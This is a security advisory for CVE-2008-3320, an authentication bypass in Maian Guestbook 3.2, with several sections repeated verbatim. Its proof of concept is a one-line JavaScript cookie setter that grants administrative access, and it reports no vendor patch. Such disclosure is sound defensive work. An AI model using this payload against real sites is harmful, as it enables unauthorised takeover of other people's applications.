Maian Guestbook 'gbook_cookie' Authentication Bypass Vulnerability
BID:30203
Info
Maian Guestbook 'gbook_cookie' Authentication Bypass Vulnerability
| Bugtraq ID: | 30203 |
| Class: | Design Error |
| CVE: |
CVE-2008-3320 |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 13 2008 12:00AM |
| Updated: | May 07 2015 05:27PM |
| Credit: | S.W.A.T. |
| Vulnerable: |
Maian Script World Maian Guestbook 3.2 |
| Not Vulnerable: | |
Discussion
Maian Guestbook 'gbook_cookie' Authentication Bypass Vulnerability
Maian Guestbook is prone to an authentication-bypass vulnerability because it fails to adequately verify user-supplied input used for cookie-based authentication.
Attackers can exploit this vulnerability to gain administrative access to the affected application.
This issue affects Maian Guestbook 3.2 and prior versions.
Maian Guestbook is prone to an authentication-bypass vulnerability because it fails to adequately verify user-supplied input used for cookie-based authentication.
Attackers can exploit this vulnerability to gain administrative access to the affected application.
This issue affects Maian Guestbook 3.2 and prior versions.
Exploit / POC
Maian Guestbook 'gbook_cookie' Authentication Bypass Vulnerability
Attackers can exploit this issue via a browser.
The following example JavaScript code to create a cookie is available:
javascript:document.cookie = "gbook_cookie=1; path=/";
Attackers can exploit this issue via a browser.
The following example JavaScript code to create a cookie is available:
javascript:document.cookie = "gbook_cookie=1; path=/";
Solution / Fix
Maian Guestbook 'gbook_cookie' Authentication Bypass Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Maian Guestbook 'gbook_cookie' Authentication Bypass Vulnerability
References:
References:
- Maian Weblog Homepage (Maian Script World)